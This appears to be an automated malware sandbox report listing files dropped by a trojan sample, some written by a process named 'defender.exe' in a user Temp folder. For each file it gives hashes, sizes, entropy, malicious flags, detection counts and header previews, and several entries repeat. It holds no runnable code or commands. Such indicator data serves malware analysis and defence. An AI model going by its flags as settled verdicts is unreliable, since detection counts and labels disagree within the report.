                                                                    SHA1:0EF0B44641D38327A360AA6954B3B6E5AAB2AF16
                                                                    SHA-256:07BEE34E189FE9A8789AED78EA59AD41414B6E611E7D74DA62F8E6CA36AF01CE
                                                                    SHA-512:B7266BC8ABC55BD389F594DAC0C0641ECF07703F35D769B87E731B5FDF4353316D44F3782A4329B3F0E260DEAD6B114426DDB1B0FB8CD4A51E0B90635F1191D9
                                                                    Malicious:false
                                                                    Preview:..............t...#.....:.t....y.....y.....y.....y.....y.....y.....y.%...y.*...y.-...yc5...y.9...y.A...y.V...yCk...y.m...y)o...yyr...y#s...y.}...y.....y....y....y................................K....!.......&.....'....(.Q...).....*.....+.*...0....1.....2.....>.....?.f...@..$..A..&..B..)..C.1/..D.M:..F..<..H.JD..I.-K..J..P..K..V..L..\..M..^..N.Vc..O.?g..Q..p..R..t..T.g|..U.X...W.....X.H...^....._.....`.....a.....b.b...c.....d.....e.....g.....i.....j.....k.....l.....m.....n.....o.....p.....r.....s.....u.....v.....x.....y.....~........*.....+...../.....4.....6.....8....T9.....9....~;.....=....q>.....@.....A....FD.....I.....M.....U.....].....c.....i.....o....Tu.....v.....w.....x.....y.....{.....|.....}..........?.........r.....s.U...t.....u.....v....w.....x....y.*...z.....{....|.<...}.....~.............1...........L..........z.................G...........X...........f.....*..........@.....................q...........Y..........W...........;........................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):4891080
                                                                    Entropy (8bit):6.392150637672776
                                                                    Encrypted:false
                                                                    SSDEEP:49152:IuhjwXkKcimPVqB4faGCMhGNYYpQVTxx6k/ftO4w6FXKpOD21pLeXvZCoFwI8ccA:oy904wYbZCoOI85oyI
                                                                    MD5:CB9807F6CF55AD799E920B7E0F97DF99
                                                                    SHA1:BB76012DED5ACD103ADAD49436612D073D159B29
                                                                    SHA-256:5653BC7B0E2701561464EF36602FF6171C96BFFE96E4C3597359CD7ADDCBA88A
                                                                    SHA-512:F7C65BAE4EDE13616330AE46A197EBAD106920DCE6A31FD5A658DA29ED1473234CA9E2B39CC9833FF903FB6B52FF19E39E6397FAC02F005823ED366CA7A34F62
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: SecuriteInfo.com.Win64.Malware-gen.19582.16146.exe, Detection: malicious
                                                                    • Filename: Installer Setup 9.7.0.exe, Detection: malicious
                                                                    • Filename: Roblox Account Manager.exe, Detection: malicious
                                                                    • Filename: lookworldafs1244.msi, Detection: malicious
                                                                    • Filename: node.js.exe, Detection: malicious
                                                                    • Filename: LeqO0KJkDX.exe, Detection: malicious
                                                                    • Filename: etnY4xJd3y.exe, Detection: malicious
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........c...c...c..Z....c...c../c....7..c.......c.......c..Z....c..Z...bc..Z....c..Z....c..Z...6c..Z.[..c..Z....c..Rich.c..................PE..d...-L............" ......8.........`.(...................................... K.....2.J...`A..........................................F.x.....F.P.....J.@.....H.......J..!....J......vD.p.....................<.(...P.<.8.............<.(............................text.....8.......8................. ..`.rdata...=....8..@....8.............@..@.data...@.....F.......F.............@....pdata........H.......G.............@..@.rsrc...@.....J.......I.............@..@.reloc........J.......I.............@..B........................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):162041856
                                                                    Entropy (8bit):6.7336610434383255
                                                                    Encrypted:false
                                                                    SSDEEP:1572864:QCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:qDAgZi
                                                                    MD5:050F6E0968C055E912AB6CA8DC12A881
                                                                    SHA1:0E1A13AD2DE9C529C001DE16D9402B302F258E4C
                                                                    SHA-256:5B287055469879FCCCA0CC432C3C975BC810D91F882C5CCED68626FEDFC30D14
                                                                    SHA-512:9BDF8E242CC60B583FB751C093612F06DBB001A5DE9DAD369078B6CA0EAED6D51109926D758B46058EBF617A8AFF761C0AF3FDBF1DF4B73264319FDB309A13FA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........."......v.....................@..........................................`...........................................D.od..e.H.T............p..,.@.............`.....:.......................:.(...`...8...........P,H......iD......................text....u.......v.................. ..`.rdata...`k......bk..|..............@..@.data....bE...L.......K.............@....pdata..,.@..p....@...V.............@..@.00cfg..(............J..............@..@.gxfg....B.......B...L..............@..@.retplne.....`...........................rodata......p...................... ..`.tls................................@....voltbl.R...............................CPADinfo8...........................@...LZMADEC............................. ..`_RDATA..............................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..`.......
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):2862080
                                                                    Entropy (8bit):6.7042588011125215
                                                                    Encrypted:false
                                                                    SSDEEP:49152:XMoI7Qj3trgDtcfkW76fSL5Yqq6uthy4Y6NO8PyJegPTagrcjdiCOi2iNN3lzl3U:H3Kk76fUq/4TagreBOirnW
                                                                    MD5:D49E7A8F096AD4722BD0F6963E0EFC08
                                                                    SHA1:6835F12391023C0C7E3C8CC37B0496E3A93A5985
                                                                    SHA-256:F11576BF7FFBC3669D1A5364378F35A1ED0811B7831528B6C4C55B0CDC7DC014
                                                                    SHA-512:CA50C28D6AAC75F749ED62EEC8ACBB53317F6BDCEF8794759AF3FAD861446DE5B7FA31622CE67A347949ABB1098ECCB32689B4F1C54458A125BC46574AD51575
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." ......".........`.........................................B...........`A..........................................).......).(.............@.x.............A..2..D.).....................(.).(...."#.8.............).P............................text....."......."................. ..`.rdata...t....#..v....".............@..@.data...X.....*.."...n*.............@....pdata..x.....@.......*.............@..@.00cfg..(....@A......B+.............@..@.gxfg....+...PA..,...D+.............@..@.retplne\.....A......p+..................tls..........A......r+.............@....voltbl.8.....A......t+................._RDATA........A......v+.............@..@.reloc...2....A..4...x+.............@..B................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):10541296
                                                                    Entropy (8bit):6.277012685259397
                                                                    Encrypted:false
                                                                    SSDEEP:98304:ffPBQYOo+ddlymff2LfPQCvliXUxiG9Ha93Whla6ZENSs285:ffPBhORjfAHliXUxiG9Ha93Whla6ZEV7
                                                                    MD5:ADFD2A259608207F256AEADB48635645
                                                                    SHA1:300BB0AE3D6B6514FB144788643D260B602AC6A4
                                                                    SHA-256:7C8C7B05D70145120B45CCB64BF75BEE3C63FF213E3E64D092D500A96AFB8050
                                                                    SHA-512:8397E74C7A85B0A2987CAE9F2C66CE446923AA4140686D91A1E92B701E16B73A6CE459540E718858607ECB12659BEDAC0AA95C2713C811A2BC2D402691FF29DC
                                                                    Malicious:false
                                                                    Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .Q....B.......B...#...B.. $...B..p$...B...$...B...%...B..`P...C...P...C...Q..(C......<C.....OC......bC..@...uC.......C..P....C.......C.......C..p....C.. ....C.......C.......D..p... D.....3D..0...FD.....YD.....lD.......D......D..0....D.......D..p....D......D..@....D.......E......E..@...*E.....=E..P...NE......bE.....rE..@....E.......E.......E..P....E.......E......E..@....F.......F.....'F..0...7F..P...JF......aF......qF...G...F.. H...F..`K...F...K...F...L...F...-...F...c...G....'.'G....'.>G..@.'.UG..0.'.oG....'..G...!'..G...!'..G..P&'..G...)'..G..@*'..H..`.(..H...e).7H..0.).VH...)*.xH....*..H....*..H...P+..H...Y+..H...Z+..I...]+. I..`^+.9I.. .+.UI....+.lI....+..I..P.-..I...=...I.......I.......I.. ....J..p....J......-J..p...EJ......ZJ......rJ..`....J..@....J.......J.......J..0....J.......J.......J..0....K..@....K..../.2K...,/.GK..../.\K..
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):479232
                                                                    Entropy (8bit):6.320849747462847
                                                                    Encrypted:false
                                                                    SSDEEP:12288:su0LAjbIkyVVR8O9v/6TiT5eU3axzvYwo:sub49/6TiQzvYX
                                                                    MD5:09134E6B407083BAAEDF9A8C0BCE68F2
                                                                    SHA1:8847344CCEEAB35C1CDF8637AF9BD59671B4E97D
                                                                    SHA-256:D2107BA0F4E28E35B22837C3982E53784D15348795B399AD6292D0F727986577
                                                                    SHA-512:6FF3ADCB8BE48D0B505A3C44E6550D30A8FEAF4AA108982A7992ED1820C06F49E0AD48D9BD92685FB82783DFD643629BD1FE4073300B61346B63320CBDB051BA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):7514112
                                                                    Entropy (8bit):6.462467169487978
                                                                    Encrypted:false
                                                                    SSDEEP:98304:BuT3g23jeZ/02YPuLaw5RoD1rfEQ3CPdOEabcgsOMdi:BuDPTwLap14QzEijsvi
                                                                    MD5:A5F1921E6DCDE9EAF42E2CCC82B3D353
                                                                    SHA1:1F6F4DF99AE475ACEC4A7D3910BADB26C15919D1
                                                                    SHA-256:50C4DC73D69B6C0189EAB56D27470EE15F99BBBC12BFD87EBE9963A7F9BA404E
                                                                    SHA-512:0C24AE7D75404ADF8682868D0EBF05F02BBF603F7DDD177CF2AF5726802D0A5AFCF539DC5D68E10DAB3FCFBA58903871C9C81054560CF08799AF1CC88F33C702
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):5430320
                                                                    Entropy (8bit):7.995406820581218
                                                                    Encrypted:true
                                                                    SSDEEP:98304:/Zgm9tHEEIcjWbEvKfwa2sEJFz993CNh1QeHQF5qrwrw5z0uxRRrY2kuDYj9ds:RgAtkEx4EKfatyNhHwFkkrw5IcRRtkFs
                                                                    MD5:7971A016AED2FB453C87EB1B8E3F5EB2
                                                                    SHA1:92B91E352BE8209FADCF081134334DEA147E23B8
                                                                    SHA-256:9CFD5D29CDE3DE2F042E5E1DA629743A7C95C1211E1B0B001E4EEBC0F0741E06
                                                                    SHA-512:42082AC0C033655F2EDAE876425A320D96CDAEE6423B85449032C63FC0F7D30914AA3531E65428451C07912265B85F5FEE2ED0BBDB362994D3A1FA7B14186013
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):162352
                                                                    Entropy (8bit):4.860588090157433
                                                                    Encrypted:false
                                                                    SSDEEP:1536:uebVb91USSzM+uCPNgswpzHD41OzB965pUB8/DR9BgyLMRPoq/rX4JHj/kMKE0YC:uTgsED41OV965LXMj4zF2Xl9B
                                                                    MD5:8FEF5A96DBCC46887C3FF392CBDB1B48
                                                                    SHA1:ED592D75222B7828B7B7AAB97B83516F60772351
                                                                    SHA-256:4DE0F720C416776423ADD7ADA621DA95D0D188D574F08E36E822AD10D85C3ECE
                                                                    SHA-512:E52C7820C69863ECC1E3B552B7F20DA2AD5492B52CAC97502152EBFF45E7A45B00E6925679FD7477CDC79C68B081D6572EEED7AED773416D42C9200ACCC7230E
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):476792
                                                                    Entropy (8bit):5.595608653079527
                                                                    Encrypted:false
                                                                    SSDEEP:3072:qqgtKzy7vqUSMd+5ZTR4ymbsLIniZiYIU+gTh3WOdvmttow2LyZDvooPmdZwmNgi:lgEzy2NTROsLftIU+gTQ4E2ro+dOmp
                                                                    MD5:A373D83D4C43BA957693AD57172A251B
                                                                    SHA1:8E0FDB714DF2F4CB058BEB46C06AA78F77E5FF86
                                                                    SHA-256:43B58CA4057CF75063D3B4A8E67AA9780D9A81D3A21F13C64B498BE8B3BA6E0C
                                                                    SHA-512:07FBD84DC3E0EC1536CCB54D5799D5ED61B962251ECE0D48E18B20B0FC9DD92DE06E93957F3EFC7D9BED88DB7794FE4F2BEC1E9B081825E41C6AC3B4F41EAB18
                                                                    Malicious:false
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1851904
                                                                    Entropy (8bit):6.5568028509093335
                                                                    Encrypted:false
                                                                    SSDEEP:49152:B+m+ocH2xfpTOi8stmFlZwwpx8AzdWgl+06OHULH5dsGfl:ihCTOi8sQrZwwpxTbG9
                                                                    MD5:3072B68E3C226AFF39E6782D025F25A8
                                                                    SHA1:CF559196D74FA490AC8CE192DB222C9F5C5A006A
                                                                    SHA-256:7FB52B781709B065C240B6B81394BE6E72E53FE11D7C8E0F7B49DD417EB78A01
                                                                    SHA-512:61EBC72C20195E99244D95AF1AB44FA06201A1AEE2B5DA04490FDC4312E8324A40B0E15A7B42FAB5179753D767C1D08AE1A7A56AC71A6E100E63F83DB849EE61
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                    Category:dropped
                                                                    Size (bytes):15239
                                                                    Entropy (8bit):7.953514640622158
                                                                    Encrypted:false
                                                                    SSDEEP:384:8rr5xQqKE5p0zBXh1fO4AGp78jMzmY1PgSZgnf:AxQq/T0VXhK88jMCu4SZkf
                                                                    MD5:3604B70768EBA4A49CADD4729A261E79
                                                                    SHA1:82E16BC5353B6418C5FB0177CD69B9377FE72404
                                                                    SHA-256:07B29BE85FFEAB47B6D0E467D084A45AEEDC8B3CE3B6EF2E2C004CA3167184D2
                                                                    SHA-512:65B4C733B376A7883319B5E64DB23196CD89ECF3FBC0100F4E346F66890D672B0CA023893838CBAB7255CF1F5A4B2B358EA0C01694A906A86ADCE11407550BF3
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1096
                                                                    Entropy (8bit):5.13006727705212
                                                                    Encrypted:false
                                                                    SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                    MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                    SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                    SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                    SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                    Malicious:false
                                                                    Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:HTML document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):6766160
                                                                    Entropy (8bit):4.735324161006094
                                                                    Encrypted:false
                                                                    SSDEEP:24576:d7rs5kjWSnB3lWNeUmf0f6W6M6q6A6r/HXpErpem:rovj
                                                                    MD5:180F8ACC70405077BADC751453D13625
                                                                    SHA1:35DC54ACAD60A98AEEC47C7ADE3E6A8C81F06883
                                                                    SHA-256:0BFA9A636E722107B6192FF35C365D963A54E1DE8A09C8157680E8D0FBBFBA1C
                                                                    SHA-512:40D3358B35EB0445127C70DEB0CB87EC1313ECA285307CDA168605A4FD3D558B4BE9EB24A59568ECA9EE1F761E578C39B2DEF63AD48E40D31958DB82F128E0EC
                                                                    Malicious:false
                                                                    Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title" style="float:left;">Credits</span>.<a id="print-link" href="#" style="float:right;" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may us
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):129690
                                                                    Entropy (8bit):7.91868310789661
                                                                    Encrypted:false
                                                                    SSDEEP:3072:AEKzwqCT4weSxQCS/qGTL2o418Gb0+VRLf0ld0GY3cQ39Vm2I:AEKzwt4hC4/rK18Gb0OV8ld0GecQ3f2
                                                                    MD5:8626E1D68E87F86C5B4DABDF66591913
                                                                    SHA1:4CD7B0AC0D3F72587708064A7B0A3BECA3F7B81C
                                                                    SHA-256:2CAA1DA9B6A6E87BDB673977FEE5DD771591A1B6ED5D3C5F14B024130A5D1A59
                                                                    SHA-512:03BCD8562482009060F249D6A0DD7382FC94D669A2094DEC08E8D119BE51BEF2C3B7B484BB5B7F805AE98E372DAB9383A2C11A63AB0F5644146556B1BB9A4C99
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):179971
                                                                    Entropy (8bit):7.941375268079628
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rDQYaEQN6AJPrSxQCS/qGTafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+HxNK/r4:rDQYaNN68rC4/Ygx5GMRejnbdZnVE6YR
                                                                    MD5:48515D600258D60019C6B9C6421F79F6
                                                                    SHA1:0EF0B44641D38327A360AA6954B3B6E5AAB2AF16
                                                                    SHA-256:07BEE34E189FE9A8789AED78EA59AD41414B6E611E7D74DA62F8E6CA36AF01CE
                                                                    SHA-512:B7266BC8ABC55BD389F594DAC0C0641ECF07703F35D769B87E731B5FDF4353316D44F3782A4329B3F0E260DEAD6B114426DDB1B0FB8CD4A51E0B90635F1191D9
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):4891080
                                                                    Entropy (8bit):6.392150637672776
                                                                    Encrypted:false
                                                                    SSDEEP:49152:IuhjwXkKcimPVqB4faGCMhGNYYpQVTxx6k/ftO4w6FXKpOD21pLeXvZCoFwI8ccA:oy904wYbZCoOI85oyI
                                                                    MD5:CB9807F6CF55AD799E920B7E0F97DF99
                                                                    SHA1:BB76012DED5ACD103ADAD49436612D073D159B29
                                                                    SHA-256:5653BC7B0E2701561464EF36602FF6171C96BFFE96E4C3597359CD7ADDCBA88A
                                                                    SHA-512:F7C65BAE4EDE13616330AE46A197EBAD106920DCE6A31FD5A658DA29ED1473234CA9E2B39CC9833FF903FB6B52FF19E39E6397FAC02F005823ED366CA7A34F62
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........c...c...c..Z....c...c../c....7..c.......c.......c..Z....c..Z...bc..Z....c..Z....c..Z...6c..Z.[..c..Z....c..Rich.c..................PE..d...-L............" ......8.........`.(...................................... K.....2.J...`A..........................................F.x.....F.P.....J.@.....H.......J..!....J......vD.p.....................<.(...P.<.8.............<.(............................text.....8.......8................. ..`.rdata...=....8..@....8.............@..@.data...@.....F.......F.............@....pdata........H.......G.............@..@.rsrc...@.....J.......I.............@..@.reloc........J.......I.............@..B........................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):162041856
                                                                    Entropy (8bit):6.7336610434383255
                                                                    Encrypted:false
                                                                    SSDEEP:1572864:QCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:qDAgZi
                                                                    MD5:050F6E0968C055E912AB6CA8DC12A881
                                                                    SHA1:0E1A13AD2DE9C529C001DE16D9402B302F258E4C
                                                                    SHA-256:5B287055469879FCCCA0CC432C3C975BC810D91F882C5CCED68626FEDFC30D14
                                                                    SHA-512:9BDF8E242CC60B583FB751C093612F06DBB001A5DE9DAD369078B6CA0EAED6D51109926D758B46058EBF617A8AFF761C0AF3FDBF1DF4B73264319FDB309A13FA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........."......v.....................@..........................................`...........................................D.od..e.H.T............p..,.@.............`.....:.......................:.(...`...8...........P,H......iD......................text....u.......v.................. ..`.rdata...`k......bk..|..............@..@.data....bE...L.......K.............@....pdata..,.@..p....@...V.............@..@.00cfg..(............J..............@..@.gxfg....B.......B...L..............@..@.retplne.....`...........................rodata......p...................... ..`.tls................................@....voltbl.R...............................CPADinfo8...........................@...LZMADEC............................. ..`_RDATA..............................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..`.......
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):2862080
                                                                    Entropy (8bit):6.7042588011125215
                                                                    Encrypted:false
                                                                    SSDEEP:49152:XMoI7Qj3trgDtcfkW76fSL5Yqq6uthy4Y6NO8PyJegPTagrcjdiCOi2iNN3lzl3U:H3Kk76fUq/4TagreBOirnW
                                                                    MD5:D49E7A8F096AD4722BD0F6963E0EFC08
                                                                    SHA1:6835F12391023C0C7E3C8CC37B0496E3A93A5985
                                                                    SHA-256:F11576BF7FFBC3669D1A5364378F35A1ED0811B7831528B6C4C55B0CDC7DC014
                                                                    SHA-512:CA50C28D6AAC75F749ED62EEC8ACBB53317F6BDCEF8794759AF3FAD861446DE5B7FA31622CE67A347949ABB1098ECCB32689B4F1C54458A125BC46574AD51575
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." ......".........`.........................................B...........`A..........................................).......).(.............@.x.............A..2..D.).....................(.).(...."#.8.............).P............................text....."......."................. ..`.rdata...t....#..v....".............@..@.data...X.....*.."...n*.............@....pdata..x.....@.......*.............@..@.00cfg..(....@A......B+.............@..@.gxfg....+...PA..,...D+.............@..@.retplne\.....A......p+..................tls..........A......r+.............@....voltbl.8.....A......t+................._RDATA........A......v+.............@..@.reloc...2....A..4...x+.............@..B................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):10541296
                                                                    Entropy (8bit):6.277012685259397
                                                                    Encrypted:false
                                                                    SSDEEP:98304:ffPBQYOo+ddlymff2LfPQCvliXUxiG9Ha93Whla6ZENSs285:ffPBhORjfAHliXUxiG9Ha93Whla6ZEV7
                                                                    MD5:ADFD2A259608207F256AEADB48635645
                                                                    SHA1:300BB0AE3D6B6514FB144788643D260B602AC6A4
                                                                    SHA-256:7C8C7B05D70145120B45CCB64BF75BEE3C63FF213E3E64D092D500A96AFB8050
                                                                    SHA-512:8397E74C7A85B0A2987CAE9F2C66CE446923AA4140686D91A1E92B701E16B73A6CE459540E718858607ECB12659BEDAC0AA95C2713C811A2BC2D402691FF29DC
                                                                    Malicious:false
                                                                    Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .Q....B.......B...#...B.. $...B..p$...B...$...B...%...B..`P...C...P...C...Q..(C......<C.....OC......bC..@...uC.......C..P....C.......C.......C..p....C.. ....C.......C.......D..p... D.....3D..0...FD.....YD.....lD.......D......D..0....D.......D..p....D......D..@....D.......E......E..@...*E.....=E..P...NE......bE.....rE..@....E.......E.......E..P....E.......E......E..@....F.......F.....'F..0...7F..P...JF......aF......qF...G...F.. H...F..`K...F...K...F...L...F...-...F...c...G....'.'G....'.>G..@.'.UG..0.'.oG....'..G...!'..G...!'..G..P&'..G...)'..G..@*'..H..`.(..H...e).7H..0.).VH...)*.xH....*..H....*..H...P+..H...Y+..H...Z+..I...]+. I..`^+.9I.. .+.UI....+.lI....+..I..P.-..I...=...I.......I.......I.. ....J..p....J......-J..p...EJ......ZJ......rJ..`....J..@....J.......J.......J..0....J.......J.......J..0....K..@....K..../.2K...,/.GK..../.\K..
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):479232
                                                                    Entropy (8bit):6.320849747462847
                                                                    Encrypted:false
                                                                    SSDEEP:12288:su0LAjbIkyVVR8O9v/6TiT5eU3axzvYwo:sub49/6TiQzvYX
                                                                    MD5:09134E6B407083BAAEDF9A8C0BCE68F2
                                                                    SHA1:8847344CCEEAB35C1CDF8637AF9BD59671B4E97D
                                                                    SHA-256:D2107BA0F4E28E35B22837C3982E53784D15348795B399AD6292D0F727986577
                                                                    SHA-512:6FF3ADCB8BE48D0B505A3C44E6550D30A8FEAF4AA108982A7992ED1820C06F49E0AD48D9BD92685FB82783DFD643629BD1FE4073300B61346B63320CBDB051BA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
